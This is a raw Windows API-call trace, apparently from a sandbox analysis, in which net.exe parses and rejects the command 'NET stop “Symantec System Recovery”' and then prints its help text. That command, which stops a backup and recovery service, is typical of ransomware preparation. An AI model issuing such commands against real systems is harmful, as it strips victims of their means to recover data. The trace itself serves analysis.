_wcsicmp (_String1="USERS", _String2="System") returned 2 [0127.237] _wcsicmp (_String1="USERS", _String2="Recovery”") returned 3 [0127.237] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0127.237] wcstok (in: _String="\r\nWORKSTATION: REDIRECTOR, REDIR, RDR, WORK, WKSTA, PRDR, DEVRDR", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nWORKSTATION", _Context=0x3d6) returned="\r\nWORKSTATION" [0127.237] wcsspn (_String="\r\nWORKSTATION", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0127.237] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" REDIRECTOR" [0127.237] wcsspn (_String=" REDIRECTOR", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0127.237] _wcsicmp (_String1="REDIRECTOR", _String2="stop") returned -1 [0127.237] _wcsicmp (_String1="REDIRECTOR", _String2="“Symantec") returned -8106 [0127.237] _wcsicmp (_String1="REDIRECTOR", _String2="System") returned -1 [0127.237] _wcsicmp (_String1="REDIRECTOR", _String2="Recovery”") returned 1 [0127.237] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" REDIR" [0127.237] wcsspn (_String=" REDIR", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0127.237] _wcsicmp (_String1="REDIR", _String2="stop") returned -1 [0127.237] _wcsicmp (_String1="REDIR", _String2="“Symantec") returned -8106 [0127.237] _wcsicmp (_String1="REDIR", _String2="System") returned -1 [0127.237] _wcsicmp (_String1="REDIR", _String2="Recovery”") returned 1 [0127.237] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" RDR" [0127.237] wcsspn (_String=" RDR", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0127.237] _wcsicmp (_String1="RDR", _String2="stop") returned -1 [0127.237] _wcsicmp (_String1="RDR", _String2="“Symantec") returned -8106 [0127.237] _wcsicmp (_String1="RDR", _String2="System") returned -1 [0127.237] _wcsicmp (_String1="RDR", _String2="Recovery”") returned -1 [0127.237] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" WORK" [0127.238] wcsspn (_String=" WORK", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0127.238] _wcsicmp (_String1="WORK", _String2="stop") returned 4 [0127.238] _wcsicmp (_String1="WORK", _String2="“Symantec") returned -8101 [0127.238] _wcsicmp (_String1="WORK", _String2="System") returned 4 [0127.238] _wcsicmp (_String1="WORK", _String2="Recovery”") returned 5 [0127.238] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" WKSTA" [0127.238] wcsspn (_String=" WKSTA", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0127.238] _wcsicmp (_String1="WKSTA", _String2="stop") returned 4 [0127.238] _wcsicmp (_String1="WKSTA", _String2="“Symantec") returned -8101 [0127.238] _wcsicmp (_String1="WKSTA", _String2="System") returned 4 [0127.238] _wcsicmp (_String1="WKSTA", _String2="Recovery”") returned 5 [0127.238] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" PRDR" [0127.238] wcsspn (_String=" PRDR", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0127.238] _wcsicmp (_String1="PRDR", _String2="stop") returned -3 [0127.238] _wcsicmp (_String1="PRDR", _String2="“Symantec") returned -8108 [0127.238] _wcsicmp (_String1="PRDR", _String2="System") returned -3 [0127.238] _wcsicmp (_String1="PRDR", _String2="Recovery”") returned -2 [0127.238] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" DEVRDR" [0127.238] wcsspn (_String=" DEVRDR", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0127.238] _wcsicmp (_String1="DEVRDR", _String2="stop") returned -15 [0127.238] _wcsicmp (_String1="DEVRDR", _String2="“Symantec") returned -8120 [0127.238] _wcsicmp (_String1="DEVRDR", _String2="System") returned -15 [0127.238] _wcsicmp (_String1="DEVRDR", _String2="Recovery”") returned -14 [0127.238] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0127.238] wcstok (in: _String="\r\nSERVER: SVR, SRV", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nSERVER", _Context=0x3d6) returned="\r\nSERVER" [0127.238] wcsspn (_String="\r\nSERVER", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0127.238] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" SVR" [0127.238] wcsspn (_String=" SVR", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0127.238] _wcsicmp (_String1="SVR", _String2="stop") returned 2 [0127.238] _wcsicmp (_String1="SVR", _String2="“Symantec") returned -8105 [0127.238] _wcsicmp (_String1="SVR", _String2="System") returned -3 [0127.238] _wcsicmp (_String1="SVR", _String2="Recovery”") returned 1 [0127.238] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" SRV" [0127.238] wcsspn (_String=" SRV", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0127.238] _wcsicmp (_String1="SRV", _String2="stop") returned -2 [0127.239] _wcsicmp (_String1="SRV", _String2="“Symantec") returned -8105 [0127.239] _wcsicmp (_String1="SRV", _String2="System") returned -7 [0127.239] _wcsicmp (_String1="SRV", _String2="Recovery”") returned 1 [0127.239] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0127.239] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc67, dwLanguageId=0x0, lpBuffer=0x2ff998, nSize=0x0, Arguments=0x2ff994 | out: lpBuffer="哀=ꔺ盹") returned 0x1c [0127.239] wcstok (in: _String="NAMES$\r\nSYNTAX$\r\nSERVICES$\r\n", _Delimiter="$", _Context=0x3d6 | out: _String="NAMES", _Context=0x3d6) returned="NAMES" [0127.239] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nSYNTAX" [0127.239] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nSERVICES" [0127.239] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\n" [0127.239] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0127.239] wcsspn (_String="NAMES", _Control="\x09\n\x0b\x0c\r ") returned 0x0 [0127.239] _wcsicmp (_String1="stop", _String2="NAMES") returned 5 [0127.239] wcsspn (_String="\r\nSYNTAX", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0127.239] _wcsicmp (_String1="stop", _String2="SYNTAX") returned -5 [0127.239] wcsspn (_String="\r\nSERVICES", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0127.239] _wcsicmp (_String1="stop", _String2="SERVICES") returned 15 [0127.239] wcscpy_s (in: _Destination=0xe5a4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0127.239] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74420000 [0127.240] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74420000, dwMessageId=0x111d, dwLanguageId=0x0, lpBuffer=0xe5b338, nSize=0x800, Arguments=0xe59dd8 | out: lpBuffer="The syntax of this command is:\r\n") returned 0x20 [0127.241] GetFileType (hFile=0x0) returned 0x0 [0127.241] LocalAlloc (uFlags=0x0, uBytes=0x40) returned 0x3d3ab8 [0127.241] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The syntax of this command is:\r\n", cchWideChar=32, lpMultiByteStr=0x3d3ab8, cbMultiByte=64, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The syntax of this command is:\r\n", lpUsedDefaultChar=0x0) returned 32 [0127.241] WriteFile (in: hFile=0x0, lpBuffer=0x3d3ab8, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ff978, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2ff978, lpOverlapped=0x0) returned 0 [0127.241] LocalFree (hMem=0x3d3ab8) returned 0x0 [0127.241] GetFileType (hFile=0x0) returned 0x0 [0127.241] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x3d37b8 [0127.241] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x3d37b8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n=", lpUsedDefaultChar=0x0) returned 2 [0127.241] WriteFile (in: hFile=0x0, lpBuffer=0x3d37b8, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x2ff978, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2ff978, lpOverlapped=0x0) returned 0 [0127.241] LocalFree (hMem=0x3d37b8) returned 0x0 [0127.241] wcscpy_s (in: _Destination=0x2ffa30, _SizeInWords=0x200, _Source="NET" | out: _Destination="NET") returned 0x0 [0127.241] wcsncat_s (in: _Destination="NET", _SizeInWords=0x200, _Source=" ", _MaxCount=0xffffffff | out: _Destination="NET ") returned 0x0 [0127.241] wcsncat_s (in: _Destination="NET ", _SizeInWords=0x200, _Source="stop", _MaxCount=0xffffffff | out: _Destination="NET stop") returned 0x0 [0127.241] wcsncat_s (in: _Destination="NET stop", _SizeInWords=0x200, _Source=" ", _MaxCount=0xffffffff | out: _Destination="NET stop ") returned 0x0 [0127.241] wcsncat_s (in: _Destination="NET stop ", _SizeInWords=0x200, _Source="“Symantec", _MaxCount=0xffffffff | out: _Destination="NET stop “Symantec") returned 0x0 [0127.241] wcsncat_s (in: _Destination="NET stop “Symantec", _SizeInWords=0x200, _Source=" ", _MaxCount=0xffffffff | out: _Destination="NET stop “Symantec ") returned 0x0 [0127.241] wcsncat_s (in: _Destination="NET stop “Symantec ", _SizeInWords=0x200, _Source="System", _MaxCount=0xffffffff | out: _Destination="NET stop “Symantec System") returned 0x0 [0127.241] wcsncat_s (in: _Destination="NET stop “Symantec System", _SizeInWords=0x200, _Source=" ", _MaxCount=0xffffffff | out: _Destination="NET stop “Symantec System ") returned 0x0 [0127.241] wcsncat_s (in: _Destination="NET stop “Symantec System ", _SizeInWords=0x200, _Source="Recovery”", _MaxCount=0xffffffff | out: _Destination="NET stop “Symantec System Recovery”") returned 0x0 [0127.242] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xbfc, dwLanguageId=0x0, lpBuffer=0x2ff978, nSize=0x0, Arguments=0x2ff974 | out: lpBuffer="唈=댸å列/Ѱå") returned 0xad [0127.242] _wcsnicmp (_String1="NET stop “Symantec System Recovery”", _String2="NET ACCOUNTS\r\n[/FORCELOGOFF:{minute", _MaxCount=0x23) returned 18 [0127.242] LocalFree (hMem=0x3d5508) returned 0x0 [0127.242] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xbff, dwLanguageId=0x0, lpBuffer=0x2ff978, nSize=0x0, Arguments=0x2ff974 | out: lpBuffer="唈=⡋盺侮/唈=塞/") returned 0x2e [0127.242] _wcsnicmp (_String1="NET stop “Symantec System Recovery”", _String2="NET COMPUTER\r\n\\\\computername {/ADD ", _MaxCount=0x23) returned 16 [0127.242] LocalFree (hMem=0x3d5508) returned 0x0 [0127.242] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc02, dwLanguageId=0x0, lpBuffer=0x2ff978, nSize=0x0, Arguments=0x2ff974 | out: lpBuffer="唈=⡋盺侮/唈=塞/") returned 0x7d [0127.242] _wcsnicmp (_String1="NET stop “Symantec System Recovery”", _String2="NET CONFIG SERVER\r\n[/AUTODISCONNECT", _MaxCount=0x23) returned 16 [0127.242] LocalFree (hMem=0x3d5508) returned 0x0 [0127.242] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc05, dwLanguageId=0x0, lpBuffer=0x2ff978, nSize=0x0, Arguments=0x2ff974 | out: lpBuffer="唈=⡋盺侮/唈=塞/") returned 0x26 [0127.242] _wcsnicmp (_String1="NET stop “Symantec System Recovery”", _String2="NET CONFIG\r\n[SERVER | WORKSTATION]\r", _MaxCount=0x23) returned 16 [0127.242] LocalFree (hMem=0x3d5508) returned 0x0 [0127.242] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc08, dwLanguageId=0x0, lpBuffer=0x2ff978, nSize=0x0, Arguments=0x2ff974 | out: lpBuffer="唈=⡋盺侮/唈=塞/") returned 0x19 [0127.242] _wcsnicmp (_String1="NET stop “Symantec System Recovery”", _String2="NET CONTINUE\r\nservice\r\n\r\n", _MaxCount=0x23) returned 16 [0127.242] LocalFree (hMem=0x3d5508) returned 0x0 [0127.242] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc0b, dwLanguageId=0x0, lpBuffer=0x2ff978, nSize=0x0, Arguments=0x2ff974 | out: lpBuffer="唈=⡋盺侮/唈=塞/") returned 0x1b [0127.242] _wcsnicmp (_String1="NET stop “Symantec System Recovery”", _String2="NET FILE\r\n[id [/CLOSE]]\r\n\r\n", _MaxCount=0x23) returned 13 [0127.242] LocalFree (hMem=0x3d5508) returned 0x0 [0127.242] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc0e, dwLanguageId=0x0, lpBuffer=0x2ff978, nSize=0x0, Arguments=0x2ff974 | out: lpBuffer="唈=⡋盺侮/唈=塞/") returned 0xbe [0127.242] _wcsnicmp (_String1="NET stop “Symantec System Recovery”", _String2="NET GROUP\r\n[groupname [/COMMENT:\"te", _MaxCount=0x23) returned 12 [0127.242] LocalFree (hMem=0x3d5508) returned 0x0 [0127.242] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc11, dwLanguageId=0x0, lpBuffer=0x2ff978, nSize=0x0, Arguments=0x2ff974 | out: lpBuffer="唈=⡋盺侮/唈=塞/") returned 0x33 [0127.242] _wcsnicmp (_String1="NET stop “Symantec System Recovery”", _String2="NET HELP\r\ncommand\r\n -or-\r\nNET c", _MaxCount=0x23) returned 11 [0127.242] LocalFree (hMem=0x3d5508) returned 0x0 [0127.242] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc14, dwLanguageId=0x0, lpBuffer=0x2ff978, nSize=0x0, Arguments=0x2ff974 | out: lpBuffer="唈=⡋盺侮/唈=塞/") returned 0x19 [0127.242] _wcsnicmp (_String1="NET stop “Symantec System Recovery”", _String2="NET HELPMSG\r\nmessage#\r\n\r\n", _MaxCount=0x23) returned 11 [0127.242] LocalFree (hMem=0x3d5508) returned 0x0 [0127.242] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc17, dwLanguageId=0x0, lpBuffer=0x2ff978, nSize=0x0, Arguments=0x2ff974 | out: lpBuffer="唈=⡋盺侮/唈=塞/") returned 0xc1 [0127.242] _wcsnicmp (_String1="NET stop “Symantec System Recovery”", _String2="NET LOCALGROUP\r\n[groupname [/COMMEN", _MaxCount=0x23) returned 7 [0127.242] LocalFree (hMem=0x3d5508) returned 0x0 [0127.242] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc1a, dwLanguageId=0x0, lpBuffer=0x2ff978, nSize=0x0, Arguments=0x2ff974 | out: lpBuffer="唈=⡋盺侮/唈=塞/") returned 0x16 [0127.242] _wcsnicmp (_String1="NET stop “Symantec System Recovery”", _String2="NET PAUSE\r\nservice\r\n\r\n", _MaxCount=0x23) returned 3 [0127.242] LocalFree (hMem=0x3d5508) returned 0x0 [0127.243] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc1d, dwLanguageId=0x0, lpBuffer=0x2ff978, nSize=0x0, Arguments=0x2ff974 | out: lpBuffer="唈=⡋盺侮/唈=塞/") returned 0x33 [0127.243] _wcsnicmp (_String1="NET stop “Symantec System Recovery”", _String2="NET SESSION\r\n[\\\\computername] [/DEL", _MaxCount=0x23) returned 15 [0127.243] LocalFree (hMem=0x3d5508) returned 0x0 [0127.243] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc20, dwLanguageId=0x0, lpBuffer=0x2ff978, nSize=0x0, Arguments=0x2ff974 | out: lpBuffer="唈=⡋盺侮/唈=塞/") returned 0x234 [0127.243] _wcsnicmp (_String1="NET stop “Symantec System Recovery”", _String2="NET SHARE\r\nsharename\r\n sha", _MaxCount=0x23) returned 12 [0127.243] LocalFree (hMem=0x3d5508) returned 0x0 [0127.243] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc23, dwLanguageId=0x0, lpBuffer=0x2ff978, nSize=0x0, Arguments=0x2ff974 | out: lpBuffer="唈=⡋盺侮/唈=塞/") returned 0x13 [0127.243] _wcsnicmp (_String1="NET stop “Symantec System Recovery”", _String2="NET START BROWSER\r\n", _MaxCount=0x23) returned 14 [0127.243] LocalFree (hMem=0x3d5508) returned 0x0 [0127.243] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc26, dwLanguageId=0x0, lpBuffer=0x2ff978, nSize=0x0, Arguments=0x2ff974 | out: lpBuffer="唈=⡋盺侮/唈=塞/") returned 0x14 [0127.243] _wcsnicmp (_String1="NET stop “Symantec System Recovery”", _String2="NET START CLIPBOOK\r\n", _MaxCount=0x23) returned 14 [0127.243] LocalFree (hMem=0x3d5508) returned 0x0 [0127.243] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc29, dwLanguageId=0x0, lpBuffer=0x2ff978, nSize=0x0, Arguments=0x2ff974 | out: lpBuffer="唈=⡋盺侮/唈=塞/") returned 0x14 [0127.243] _wcsnicmp (_String1="NET stop “Symantec System Recovery”", _String2="NET START EVENTLOG\r\n", _MaxCount=0x23) returned 14 [0127.243] LocalFree (hMem=0x3d5508) returned 0x0 [0127.243] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc2c, dwLanguageId=0x0, lpBuffer=0x2ff978, nSize=0x0, Arguments=0x2ff974 | out: lpBuffer="唈=⡋盺侮/唈=塞/") returned 0x15 [0127.244] _wcsnicmp (_String1="NET stop “Symantec System Recovery”", _String2="NET START MESSENGER\r\n", _MaxCount=0x23) returned 14 [0127.244] LocalFree (hMem=0x3d5508) returned 0x0 [0127.244] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc2f, dwLanguageId=0x0, lpBuffer=0x2ff978, nSize=0x0, Arguments=0x2ff974 | out: lpBuffer="唈=⡋盺侮/唈=塞/") returned 0x15 [0127.244] _wcsnicmp (_String1="NET stop “Symantec System Recovery”", _String2="NET START NET LOGON\r\n", _MaxCount=0x23) returned 14 [0127.244] LocalFree (hMem=0x3d5508) returned 0x0 [0127.244] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc32, dwLanguageId=0x0, lpBuffer=0x2ff978, nSize=0x0, Arguments=0x2ff974 | out: lpBuffer="唈=⡋盺侮/唈=塞/") returned 0x16 [0127.244] _wcsnicmp (_String1="NET stop “Symantec System Recovery”", _String2="NET START RPCLOCATOR\r\n", _MaxCount=0x23) returned 14 [0127.244] LocalFree (hMem=0x3d5508) returned 0x0 [0127.244] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc35, dwLanguageId=0x0, lpBuffer=0x2ff978, nSize=0x0, Arguments=0x2ff974 | out: lpBuffer="唈=⡋盺侮/唈=塞/") returned 0x11 [0127.244] _wcsnicmp (_String1="NET stop “Symantec System Recovery”", _String2="NET START RPCSS\r\n", _MaxCount=0x23) returned 14 [0127.244] LocalFree (hMem=0x3d5508) returned 0x0 [0127.244] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc38, dwLanguageId=0x0, lpBuffer=0x2ff978, nSize=0x0, Arguments=0x2ff974 | out: lpBuffer="唈=⡋盺侮/唈=塞/") returned 0x14 [0127.244] _wcsnicmp (_String1="NET stop “Symantec System Recovery”", _String2="NET START SCHEDULE\r\n", _MaxCount=0x23) returned 14 [0127.244] LocalFree (hMem=0x3d5508) returned 0x0 [0127.244] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc3b, dwLanguageId=0x0, lpBuffer=0x2ff978, nSize=0x0, Arguments=0x2ff974 | out: lpBuffer="唈=⡋盺侮/唈=塞/") returned 0x12 [0127.244] _wcsnicmp (_String1="NET stop “Symantec System Recovery”", _String2="NET START SERVER\r\n", _MaxCount=0x23) returned 14 [0127.244] LocalFree (hMem=0x3d5508) returned 0x0 [0127.244] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc3e, dwLanguageId=0x0, lpBuffer=0x2ff978, nSize=0x0, Arguments=0x2ff974 | out: lpBuffer="唈=⡋盺侮/唈=塞/") returned 0xf [0127.244] _wcsnicmp (_String1="NET stop “Symantec System Recovery”", _String2="NET START UPS\r\n", _MaxCount=0x23) returned 14 [0127.244] LocalFree (hMem=0x3d5508) returned 0x0 [0127.244] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc41, dwLanguageId=0x0, lpBuffer=0x2ff978, nSize=0x0, Arguments=0x2ff974 | out: lpBuffer="唈=⡋盺侮/唈=塞/") returned 0x17 [0127.244] _wcsnicmp (_String1="NET stop “Symantec System Recovery”", _String2="NET START WORKSTATION\r\n", _MaxCount=0x23) returned 14 [0127.244] LocalFree (hMem=0x3d5508) returned 0x0 [0127.244] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc44, dwLanguageId=0x0, lpBuffer=0x2ff978, nSize=0x0, Arguments=0x2ff974 | out: lpBuffer="唈=⡋盺侮/唈=塞/") returned 0x18 [0127.244] _wcsnicmp (_String1="NET stop “Symantec System Recovery”", _String2="NET START\r\n[service]\r\n\r\n", _MaxCount=0x23) returned 14 [0127.244] LocalFree (hMem=0x3d5508) returned 0x0 [0127.244] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc47, dwLanguageId=0x0, lpBuffer=0x2ff978, nSize=0x0, Arguments=0x2ff974 | out: lpBuffer="唈=⡋盺侮/唈=塞/") returned 0x2a [0127.244] _wcsnicmp (_String1="NET stop “Symantec System Recovery”", _String2="NET STATISTICS\r\n[WORKSTATION | SERV", _MaxCount=0x23) returned 14 [0127.244] LocalFree (hMem=0x3d5508) returned 0x0 [0127.244] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc4a, dwLanguageId=0x0, lpBuffer=0x2ff978, nSize=0x0, Arguments=0x2ff974 | out: lpBuffer="唈=⡋盺侮/唈=塞/") returned 0x15 [0127.244] _wcsnicmp (_String1="NET stop “Symantec System Recovery”", _String2="NET STOP\r\nservice\r\n\r\n", _MaxCount=0x23) returned 19 [0127.244] LocalFree (hMem=0x3d5508) returned 0x0 [0127.244] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc4d, dwLanguageId=0x0, lpBuffer=0x2ff978, nSize=0x0, Arguments=0x2ff974 | out: lpBuffer="唈=⡋盺侮/唈=塞/") returned 0x58 [0127.245] _wcsnicmp (_String1="NET stop “Symantec System Recovery”", _String2="NET TIME\r\n\r\n[\\\\computername | /DOMA", _MaxCount=0x23) returned -1 [0127.245] LocalFree (hMem=0x3d5508) returned 0x0 [0127.245] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc50, dwLanguageId=0x0, lpBuffer=0x2ff978, nSize=0x0, Arguments=0x2ff974 | out: lpBuffer="唈=⡋盺侮/唈=塞/") returned 0x184 [0127.245] _wcsnicmp (_String1="NET stop “Symantec System Recovery”", _String2="NET USE\r\n[devicename | *] [\\\\comput", _MaxCount=0x23) returned -2 [0127.245] LocalFree (hMem=0x3d5508) returned 0x0 [0127.245] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc53, dwLanguageId=0x0, lpBuffer=0x2ff978, nSize=0x0, Arguments=0x2ff974 | out: lpBuffer="唈=⡋盺侮/唈=塞/") returned 0xc7 [0127.245] _wcsnicmp (_String1="NET stop “Symantec System Recovery”", _String2="NET USER\r\n[username [password | *] ", _MaxCount=0x23) returned -2 [0127.245] LocalFree (hMem=0x3d5508) returned 0x0 [0127.245] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc56, dwLanguageId=0x0, lpBuffer=0x2ff978, nSize=0x0, Arguments=0x2ff974 | out: lpBuffer="唈=⡋盺侮/唈=塞/") returned 0x47 [0127.245] _wcsnicmp (_String1="NET stop “Symantec System Recovery”", _String2="NET VIEW\r\n[\\\\computername [/CACHE] ", _MaxCount=0x23) returned -3 [0127.245] LocalFree (hMem=0x3d5508) returned 0x0 [0127.245] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc59, dwLanguageId=0x0, lpBuffer=0x2ff978, nSize=0x0, Arguments=0x2ff974 | out: lpBuffer="唈=⡋盺侮/唈=塞/") returned 0xc2 [0127.245] _wcsnicmp (_String1="NET stop “Symantec System Recovery”", _String2="NET\r\n [ ACCOUNTS | COMPUTER | CO", _MaxCount=0x23) returned 19 [0127.245] LocalFree (hMem=0x3d5508) returned 0x0 [0127.245] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc5c, dwLanguageId=0x0, lpBuffer=0x2ff978, nSize=0x0, Arguments=0x2ff974 | out: lpBuffer="唈=⡋盺侮/唈=塞/") returned 0x319 [0127.245] _wcsnicmp (_String1="NET stop “Symantec System Recovery”", _String2="SERVICES\r\nNET START can be used to ", _MaxCount=0x23) returned -5 [0127.245] LocalFree (hMem=0x3d5508) returned 0x0 [0127.245] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc5f, dwLanguageId=0x0, lpBuffer=0x2ff978, nSize=0x0, Arguments=0x2ff974 | out: lpBuffer="唈=⡋盺侮/唈=塞/") returned 0x483 [0127.245] _wcsnicmp (_String1="NET stop “Symantec System Recovery”", _String2="SYNTAX\r\nThe following conventions a", _MaxCount=0x23) returned -5 [0127.245] LocalFree (hMem=0x3d5508) returned 0x0 [0127.245] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc62, dwLanguageId=0x0, lpBuffer=0x2ff978, nSize=0x0, Arguments=0x2ff974 | out: lpBuffer="唈=⡋盺侮/唈=塞/") returned 0xa86 [0127.245] _wcsnicmp (_String1="NET stop “Symantec System Recovery”", _String2="NAMES\r\nThe following types of names", _MaxCount=0x23) returned 4 [0127.245] LocalFree (hMem=0x3d5508) returned 0x0 [0127.245] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc65, dwLanguageId=0x0, lpBuffer=0x2ff978, nSize=0x0, Arguments=0x2ff974 | out: lpBuffer="唈=⡋盺侮/唈=塞/") returned 0x54 [0127.246] _wcsnicmp (_String1="NET stop “Symantec System Recovery”", _String2="\r\nFor more information on tools see", _MaxCount=0x23) returned 97 [0127.246] LocalFree (hMem=0x3d5508) returned 0x0 [0127.246] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xbfc, dwLanguageId=0x0, lpBuffer=0x2ff978, nSize=0x0, Arguments=0x2ff974 | out: lpBuffer="唈=⡋盺侮/唈=塞/") returned 0xad [0127.246] _wcsnicmp (_String1="NET stop “Symantec System", _String2="NET ACCOUNTS\r\n[/FORCELOGO", _MaxCount=0x19) returned 18 [0127.246] LocalFree (hMem=0x3d5508) returned 0x0 [0127.246] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xbff, dwLanguageId=0x0, lpBuffer=0x2ff978, nSize=0x0, Arguments=0x2ff974 | out: lpBuffer="唈=⡋盺侮/唈=塞/") returned 0x2e [0127.246] _wcsnicmp (_String1="NET stop “Symantec System", _String2="NET COMPUTER\r\n\\\\computern", _MaxCount=0x19) returned 16 [0127.246] LocalFree (hMem=0x3d5508) returned 0x0 [0127.246] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc02, dwLanguageId=0x0, lpBuffer=0x2ff978, nSize=0x0, Arguments=0x2ff974 | out: lpBuffer="唈=⡋盺侮/唈=塞/") returned 0x7d [0127.246] _wcsnicmp (_String1="NET stop “Symantec System", _String2="NET CONFIG SERVER\r\n[/AUTO", _MaxCount=0x19) returned 16 [0127.246] LocalFree (hMem=0x3d5508) returned 0x0 [0127.246] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc05, dwLanguageId=0x0, lpBuffer=0x2ff978, nSize=0x0, Arguments=0x2ff974 | out: lpBuffer="唈=⡋盺侮/唈=塞/") returned 0x26 [0127.246] _wcsnicmp (_String1="NET stop “Symantec System", _String2="NET CONFIG\r\n[SERVER | WOR", _MaxCount=0x19) returned 16 [0127.246] LocalFree (hMem=0x3d5508) returned 